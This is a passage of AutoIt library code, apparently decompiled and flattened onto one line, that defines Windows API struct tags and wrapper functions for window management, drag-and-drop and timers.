SrcY;dword crKey;byte BlendOp;byte BlendFlags;byte Alpha;byte AlphaFormat;dword Flags;long DirtyLeft;long DirtyTop;long DirtyRight;long DirtyBottom" GLOBAL CONST $TAGWINDOWINFO = "dword Size;struct;long rWindow[4];endstruct;struct;long rClient[4];endstruct;dword Style;dword ExStyle;dword WindowStatus;uint cxWindowBorders;uint cyWindowBorders;word atomWindowType;word CreatorVersion" GLOBAL CONST $TAGWNDCLASS = "uint Style;ptr hWndProc;int ClsExtra;int WndExtra;ptr hInstance;ptr hIcon;ptr hCursor;ptr hBackground;ptr MenuName;ptr ClassName" GLOBAL CONST $TAGWNDCLASSEX = "uint Size;uint Style;ptr hWndProc;int ClsExtra;int WndExtra;ptr hInstance;ptr hIcon;ptr hCursor;ptr hBackground;ptr MenuName;ptr ClassName;ptr hIconSm" GLOBAL CONST $TAGFLASHWINFO = "uint Size;hwnd hWnd;dword Flags;uint Count;dword TimeOut" FUNC _WINAPI_ADJUSTWINDOWRECTEX (BYREF $TRECT , $ISTYLE , $IEXSTYLE = 0 , $BMENU = FALSE ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "AdjustWindowRectEx" , "struct*" , $TRECT , "dword" , $ISTYLE , "bool" , $BMENU , "dword" , $IEXSTYLE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ANIMATEWINDOW ($HWND , $IFLAGS , $IDURATION = 1000 ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "AnimateWindow" , "hwnd" , $HWND , "dword" , $IDURATION , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_BEGINDEFERWINDOWPOS ($IAMOUNT = 1 ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "BeginDeferWindowPos" , "int" , $IAMOUNT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_BRINGWINDOWTOTOP ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "BringWindowToTop" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_BROADCASTSYSTEMMESSAGE ($IMSG , $WPARAM = 0 , $LPARAM = 0 , $IFLAGS = 0 , $IRECIPIENTS = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "long" , "BroadcastSystemMessageW" , "dword" , $IFLAGS , "dword*" , $IRECIPIENTS , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM ) IF @ERROR OR ($ARET [0 ] = + 4294967295 ) THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN SETEXTENDED ($ARET [2 ] , $ARET [0 ] ) ENDFUNC FUNC _WINAPI_CALLWINDOWPROC ($PPREVWNDFUNC , $HWND , $IMSG , $WPARAM , $LPARAM ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "lresult" , "CallWindowProc" , "ptr" , $PPREVWNDFUNC , "hwnd" , $HWND , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CALLWINDOWPROCW ($PPREVWNDPROC , $HWND , $IMSG , $WPARAM , $LPARAM ) LOCAL $ARET = DLLCALL ("user32.dll" , "lresult" , "CallWindowProcW" , "ptr" , $PPREVWNDPROC , "hwnd" , $HWND , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CASCADEWINDOWS ($AWNDS , $TRECT = 0 , $HPARENT = 0 , $IFLAGS = 0 , $ISTART = 0 , $IEND = + 4294967295 ) IF __CHECKERRORARRAYBOUNDS ($AWNDS , $ISTART , $IEND ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ICOUNT = $IEND - $ISTART + 1 LOCAL $TWNDS = DLLSTRUCTCREATE ("hwnd[" & $ICOUNT & "]" ) $ICOUNT = 1 FOR $I = $ISTART TO $IEND DLLSTRUCTSETDATA ($TWNDS , 1 , $AWNDS [$I ] , $ICOUNT ) $ICOUNT += 1 NEXT LOCAL $ARET = DLLCALL ("user32.dll" , "word" , "CascadeWindows" , "hwnd" , $HPARENT , "uint" , $IFLAGS , "struct*" , $TRECT , "uint" , $ICOUNT + 4294967295 , "struct*" , $TWNDS ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CHANGEWINDOWMESSAGEFILTEREX ($HWND , $IMSG , $IACTION ) LOCAL $TCFS , $ARET IF $HWND AND ($__WINVER > 1536 ) THEN LOCAL CONST $TAGCHANGEFILTERSTRUCT = "dword cbSize; dword ExtStatus" $TCFS = DLLSTRUCTCREATE ($TAGCHANGEFILTERSTRUCT ) DLLSTRUCTSETDATA ($TCFS , 1 , DLLSTRUCTGETSIZE ($TCFS ) ) $ARET = DLLCALL ("user32.dll" , "bool" , "ChangeWindowMessageFilterEx" , "hwnd" , $HWND , "uint" , $IMSG , "dword" , $IACTION , "struct*" , $TCFS ) ELSE $TCFS = 0 $ARET = DLLCALL ("user32.dll" , "bool" , "ChangeWindowMessageFilter" , "uint" , $IMSG , "dword" , $IACTION ) ENDIF IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN SETEXTENDED (DLLSTRUCTGETDATA ($TCFS , 2 ) , 1 ) ENDFUNC FUNC _WINAPI_CHILDWINDOWFROMPOINTEX ($HWND , $TPOINT , $IFLAGS = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "hwnd" , "ChildWindowFromPointEx" , "hwnd" , $HWND , "struct" , $TPOINT , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CLOSEWINDOW ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "CloseWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_DEFERWINDOWPOS ($HINFO , $HWND , $HAFTER , $IX , $IY , $IWIDTH , $IHEIGHT , $IFLAGS ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "DeferWindowPos" , "handle" , $HINFO , "hwnd" , $HWND , "hwnd" , $HAFTER , "int" , $IX , "int" , $IY , "int" , $IWIDTH , "int" , $IHEIGHT , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_DEFWINDOWPROC ($HWND , $IMSG , $WPARAM , $LPARAM ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "lresult" , "DefWindowProc" , "hwnd" , $HWND , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_DEFWINDOWPROCW ($HWND , $IMSG , $WPARAM , $LPARAM ) LOCAL $ARET = DLLCALL ("user32.dll" , "lresult" , "DefWindowProcW" , "hwnd" , $HWND , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_DEREGISTERSHELLHOOKWINDOW ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "DeregisterShellHookWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_DRAGACCEPTFILES ($HWND , $BACCEPT = TRUE ) DLLCALL ("shell32.dll" , "none" , "DragAcceptFiles" , "hwnd" , $HWND , "bool" , $BACCEPT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_DRAGFINISH ($HDROP ) DLLCALL ("shell32.dll" , "none" , "DragFinish" , "handle" , $HDROP ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_DRAGQUERYFILEEX ($HDROP , $IFLAG = 0 ) LOCAL $ARET = DLLCALL ("shell32.dll" , "uint" , "DragQueryFileW" , "handle" , $HDROP , "uint" , + 4294967295 , "ptr" , 0 , "uint" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF NOT $ARET [0 ] THEN RETURN SETERROR (10 , 0 , 0 ) LOCAL $ICOUNT = $ARET [0 ] LOCAL $ARESULT [$ICOUNT + 1 ] FOR $I = 0 TO $ICOUNT + 4294967295 $ARET = DLLCALL ("shell32.dll" , "uint" , "DragQueryFileW" , "handle" , $HDROP , "uint" , $I , "wstr" , "" , "uint" , 4096 ) IF NOT $ARET [0 ] THEN RETURN SETERROR (11 , 0 , 0 ) IF $IFLAG THEN LOCAL $BDIR = _WINAPI_PATHISDIRECTORY ($ARET [3 ] ) IF (($IFLAG = 1 ) AND $BDIR ) OR (($IFLAG = 2 ) AND NOT $BDIR ) THEN CONTINUELOOP ENDIF ENDIF $ARESULT [$I + 1 ] = $ARET [3 ] $ARESULT [0 ] += 1 NEXT IF NOT $ARESULT [0 ] THEN RETURN SETERROR (12 , 0 , 0 ) __INC ($ARESULT , + 4294967295 ) RETURN $ARESULT ENDFUNC FUNC _WINAPI_DRAGQUERYPOINT ($HDROP ) LOCAL $TPOINT = DLLSTRUCTCREATE ($TAGPOINT ) LOCAL $ARET = DLLCALL ("shell32.dll" , "bool" , "DragQueryPoint" , "handle" , $HDROP , "struct*" , $TPOINT ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TPOINT ENDFUNC FUNC _WINAPI_ENDDEFERWINDOWPOS ($HINFO ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "EndDeferWindowPos" , "handle" , $HINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ENUMCHILDWINDOWS ($HWND , $BVISIBLE = TRUE ) IF NOT _WINAPI_GETWINDOW ($HWND , 5 ) THEN RETURN SETERROR (2 , 0 , 0 ) LOCAL $HENUMPROC = DLLCALLBACKREGISTER ("__EnumWindowsProc" , "bool" , "hwnd;lparam" ) DIM $__G_VENUM [101 ] [2 ] = [[0 ] ] DLLCALL ("user32.dll" , "bool" , "EnumChildWindows" , "hwnd" , $HWND , "ptr" , DLLCALLBACKGETPTR ($HENUMPROC ) , "lparam" , $BVISIBLE ) IF @ERROR OR NOT $__G_VENUM [0 ] [0 ] THEN $__G_VENUM = @ERROR + 10 ENDIF DLLCALLBACKFREE ($HENUMPROC ) IF $__G_VENUM THEN RETURN SETERROR ($__G_VENUM , 0 , 0 ) __INC ($__G_VENUM , + 4294967295 ) RETURN $__G_VENUM ENDFUNC FUNC _WINAPI_FINDWINDOW ($SCLASSNAME , $SWINDOWNAME ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "FindWindowW" , "wstr" , $SCLASSNAME , "wstr" , $SWINDOWNAME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_FLASHWINDOW ($HWND , $BINVERT = TRUE ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "FlashWindow" , "hwnd" , $HWND , "bool" , $BINVERT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_FLASHWINDOWEX ($HWND , $IFLAGS = 3 , $ICOUNT = 3 , $ITIMEOUT = 0 ) LOCAL $TFLASH = DLLSTRUCTCREATE ($TAGFLASHWINFO ) LOCAL $IFLASH = DLLSTRUCTGETSIZE ($TFLASH ) LOCAL $IMODE = 0 IF BITAND ($IFLAGS , 1 ) <> 0 THEN $IMODE = BITOR ($IMODE , $FLASHW_CAPTION ) IF BITAND ($IFLAGS , 2 ) <> 0 THEN $IMODE = BITOR ($IMODE , $FLASHW_TRAY ) IF BITAND ($IFLAGS , 4 ) <> 0 THEN $IMODE = BITOR ($IMODE , $FLASHW_TIMER ) IF BITAND ($IFLAGS , 8 ) <> 0 THEN $IMODE = BITOR ($IMODE , $FLASHW_TIMERNOFG ) DLLSTRUCTSETDATA ($TFLASH , "Size" , $IFLASH ) DLLSTRUCTSETDATA ($TFLASH , "hWnd" , $HWND ) DLLSTRUCTSETDATA ($TFLASH , "Flags" , $IMODE ) DLLSTRUCTSETDATA ($TFLASH , "Count" , $ICOUNT ) DLLSTRUCTSETDATA ($TFLASH , "Timeout" , $ITIMEOUT ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "FlashWindowEx" , "struct*" , $TFLASH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETANCESTOR ($HWND , $IFLAGS = 1 ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "GetAncestor" , "hwnd" , $HWND , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETCLASSINFOEX ($SCLASS , $HINSTANCE = 0 ) LOCAL $STYPEOFCLASS = "ptr" IF ISSTRING ($SCLASS ) THEN $STYPEOFCLASS = "wstr" ENDIF LOCAL $TWNDCLASSEX = DLLSTRUCTCREATE ($TAGWNDCLASSEX ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetClassInfoExW" , "handle" , $HINSTANCE , $STYPEOFCLASS , $SCLASS , "struct*" , $TWNDCLASSEX ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TWNDCLASSEX ENDFUNC FUNC _WINAPI_GETCLASSLONGEX ($HWND , $IINDEX ) LOCAL $ARET IF @AUTOITX64 THEN $ARET = DLLCALL ("user32.dll" , "ulong_ptr" , "GetClassLongPtrW" , "hwnd" , $HWND , "int" , $IINDEX ) ELSE $ARET = DLLCALL ("user32.dll" , "dword" , "GetClassLongW" , "hwnd" , $HWND , "int" , $IINDEX ) ENDIF IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETCLIENTHEIGHT ($HWND ) LOCAL $TRECT = _WINAPI_GETCLIENTRECT ($HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN DLLSTRUCTGETDATA ($TRECT , "Bottom" ) - DLLSTRUCTGETDATA ($TRECT , "Top" ) ENDFUNC FUNC _WINAPI_GETCLIENTWIDTH ($HWND ) LOCAL $TRECT = _WINAPI_GETCLIENTRECT ($HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN DLLSTRUCTGETDATA ($TRECT , "Right" ) - DLLSTRUCTGETDATA ($TRECT , "Left" ) ENDFUNC FUNC _WINAPI_GETDLGITEM ($HWND , $IITEMID ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "GetDlgItem" , "hwnd" , $HWND , "int" , $IITEMID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETFOREGROUNDWINDOW () LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "GetForegroundWindow" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETGUITHREADINFO ($ITHREADID ) LOCAL CONST $TAGGUITHREADINFO = "dword Size;dword Flags;hwnd hWndActive;hwnd hWndFocus;hwnd hWndCapture;hwnd hWndMenuOwner;hwnd hWndMoveSize;hwnd hWndCaret;struct rcCaret;long left;long top;long right;long bottom;endstruct" LOCAL $TGTI = DLLSTRUCTCREATE ($TAGGUITHREADINFO ) DLLSTRUCTSETDATA ($TGTI , 1 , DLLSTRUCTGETSIZE ($TGTI ) ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetGUIThreadInfo" , "dword" , $ITHREADID , "struct*" , $TGTI ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ARESULT [11 ] FOR $I = 0 TO 10 $ARESULT [$I ] = DLLSTRUCTGETDATA ($TGTI , $I + 2 ) NEXT FOR $I = 9 TO 10 $ARESULT [$I ] -= $ARESULT [$I + 4294967294 ] NEXT RETURN $ARESULT ENDFUNC FUNC _WINAPI_GETLASTACTIVEPOPUP ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "hwnd" , "GetLastActivePopup" , "hwnd" , $HWND ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) IF $ARET [0 ] = $HWND THEN RETURN SETERROR (1 , 0 , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETLAYEREDWINDOWATTRIBUTES ($HWND , BYREF $ITRANSCOLOR , BYREF $ITRANSGUI , $BCOLORREF = FALSE ) $ITRANSCOLOR = + 4294967295 $ITRANSGUI = + 4294967295 LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "GetLayeredWindowAttributes" , "hwnd" , $HWND , "INT*" , $ITRANSCOLOR , "byte*" , $ITRANSGUI , "dword*" , 0 ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF NOT $BCOLORREF THEN $ARESULT [2 ] = INT (BINARYMID ($ARESULT [2 ] , 3 , 1 ) & BINARYMID ($ARESULT [2 ] , 2 , 1 ) & BINARYMID ($ARESULT [2 ] , 1 , 1 ) ) ENDIF $ITRANSCOLOR = $ARESULT [2 ] $ITRANSGUI = $ARESULT [3 ] RETURN $ARESULT [4 ] ENDFUNC FUNC _WINAPI_GETMESSAGEEXTRAINFO () LOCAL $ARET = DLLCALL ("user32.dll" , "lparam" , "GetMessageExtraInfo" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETSHELLWINDOW () LOCAL $ARET = DLLCALL ("user32.dll" , "hwnd" , "GetShellWindow" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETTOPWINDOW ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "hwnd" , "GetTopWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETWINDOWDISPLAYAFFINITY ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetWindowDisplayAffinity" , "hwnd" , $HWND , "dword*" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_GETWINDOWINFO ($HWND ) LOCAL $TWINDOWINFO = DLLSTRUCTCREATE ($TAGWINDOWINFO ) DLLSTRUCTSETDATA ($TWINDOWINFO , "Size" , DLLSTRUCTGETSIZE ($TWINDOWINFO ) ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetWindowInfo" , "hwnd" , $HWND , "struct*" , $TWINDOWINFO ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TWINDOWINFO ENDFUNC FUNC _WINAPI_GETWINDOWPLACEMENT ($HWND ) LOCAL $TWINDOWPLACEMENT = DLLSTRUCTCREATE ($TAGWINDOWPLACEMENT ) DLLSTRUCTSETDATA ($TWINDOWPLACEMENT , "length" , DLLSTRUCTGETSIZE ($TWINDOWPLACEMENT ) ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetWindowPlacement" , "hwnd" , $HWND , "struct*" , $TWINDOWPLACEMENT ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TWINDOWPLACEMENT ENDFUNC FUNC _WINAPI_ISCHILD ($HWND , $HWNDPARENT ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "IsChild" , "hwnd" , $HWNDPARENT , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ISHUNGAPPWINDOW ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "IsHungAppWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ISICONIC ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "IsIconic" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ISWINDOWUNICODE ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "IsWindowUnicode" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ISZOOMED ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "IsZoomed" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_KILLTIMER ($HWND , $ITIMERID ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "KillTimer" , "hwnd" , $HWND , "uint_ptr" , $ITIMERID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_OPENICON ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "OpenIcon" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_POSTMESSAGE ($HWND , $IMSG , $WPARAM , $LPARAM ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "PostMessage" , "hwnd" , $HWND , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_REGISTERCLASS ($TWNDCLASS ) LOCAL $ARET = DLLCALL ("user32.dll" , "word" , "RegisterClassW" , "struct*" , $TWNDCLASS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_REGISTERCLASSEX ($TWNDCLASSEX ) LOCAL $ARET = DLLCALL ("user32.dll" , "word" , "RegisterClassExW" , "struct*" , $TWNDCLASSEX ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_REGISTERSHELLHOOKWINDOW ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "RegisterShellHookWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_REGISTERWINDOWMESSAGE ($SMESSAGE ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "uint" , "RegisterWindowMessageW" , "wstr" , $SMESSAGE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SENDMESSAGETIMEOUT ($HWND , $IMSG , $WPARAM = 0 , $LPARAM = 0 , $ITIMEOUT = 1000 , $IFLAGS = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "lresult" , "SendMessageTimeoutW" , "hwnd" , $HWND , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM , "uint" , $IFLAGS , "uint" , $ITIMEOUT , "dword_ptr*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) IF NOT $ARET [0 ] THEN RETURN SETERROR (10 , _WINAPI_GETLASTERROR () , + 4294967295 ) RETURN $ARET [7 ] ENDFUNC FUNC _WINAPI_SETCLASSLONGEX ($HWND , $IINDEX , $INEWLONG ) LOCAL $ARET IF @AUTOITX64 THEN $ARET = DLLCALL ("user32.dll" , "ulong_ptr" , "SetClassLongPtrW" , "hwnd" , $HWND , "int" , $IINDEX , "long_ptr" , $INEWLONG ) ELSE $ARET = DLLCALL ("user32.dll" , "dword" , "SetClassLongW" , "hwnd" , $HWND , "int" , $IINDEX , "long" , $INEWLONG ) ENDIF IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETFOREGROUNDWINDOW ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "SetForegroundWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETLAYEREDWINDOWATTRIBUTES ($HWND , $ITRANSCOLOR , $ITRANSGUI = 255 , $IFLAGS = 3 , $BCOLORREF = FALSE ) IF $IFLAGS = DEFAULT OR $IFLAGS = "" OR $IFLAGS < 0 THEN $IFLAGS = 3 IF NOT $BCOLORREF THEN $ITRANSCOLOR = INT (BINARYMID ($ITRANSCOLOR , 3 , 1 ) & BINARYMID ($ITRANSCOLOR , 2 , 1 ) & BINARYMID ($ITRANSCOLOR , 1 , 1 ) ) ENDIF LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "SetLayeredWindowAttributes" , "hwnd" , $HWND , "INT" , $ITRANSCOLOR , "byte" , $ITRANSGUI , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETMESSAGEEXTRAINFO ($LPARAM ) LOCAL $ARET = DLLCALL ("user32.dll" , "lparam" , "SetMessageExtraInfo" , "lparam" , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETSYSCOLORS ($VELEMENTS , $VCOLORS ) LOCAL $BISEARRAY = ISARRAY ($VELEMENTS ) , $BISCARRAY = ISARRAY ($VCOLORS ) LOCAL $IELEMENTNUM IF NOT $BISCARRAY AND NOT $BISEARRAY THEN $IELEMENTNUM = 1 ELSEIF $BISCARRAY OR $BISEARRAY THEN IF NOT $BISCARRAY OR NOT $BISEARRAY THEN RETURN SETERROR (+ 4294967295 , + 4294967295 , FALSE ) IF UBOUND ($VELEMENTS ) <> UBOUND ($VCOLORS ) THEN RETURN SETERROR (+ 4294967295 , + 4294967295 , FALSE ) $IELEMENTNUM = UBOUND ($VELEMENTS ) ENDIF LOCAL $TELEMENTS = DLLSTRUCTCREATE ("int Element[" & $IELEMENTNUM & "]" ) LOCAL $TCOLORS = DLLSTRUCTCREATE ("INT NewColor[" & $IELEMENTNUM & "]" ) IF NOT $BISEARRAY THEN DLLSTRUCTSETDATA ($TELEMENTS , "Element" , $VELEMENTS , 1 ) ELSE FOR $X = 0 TO $IELEMENTNUM + 4294967295 DLLSTRUCTSETDATA ($TELEMENTS , "Element" , $VELEMENTS [$X ] , $X + 1 ) NEXT ENDIF IF NOT $BISCARRAY THEN DLLSTRUCTSETDATA ($TCOLORS , "NewColor" , $VCOLORS , 1 ) ELSE FOR $X = 0 TO $IELEMENTNUM + 4294967295 DLLSTRUCTSETDATA ($TCOLORS , "NewColor" , $VCOLORS [$X ] , $X + 1 ) NEXT ENDIF LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "SetSysColors" , "int" , $IELEMENTNUM , "struct*" , $TELEMENTS , "struct*" , $TCOLORS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETTIMER ($HWND , $ITIMERID , $IELAPSE , $PTIMERFUNC ) LOCAL $ARET = DLLCALL ("user32.dll" , "uint_ptr" , "SetTimer" , "hwnd" , $HWND , "uint_ptr" , $ITIMERID , "uint" , $IELAPSE , "ptr" , $PTIMERFUNC ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET 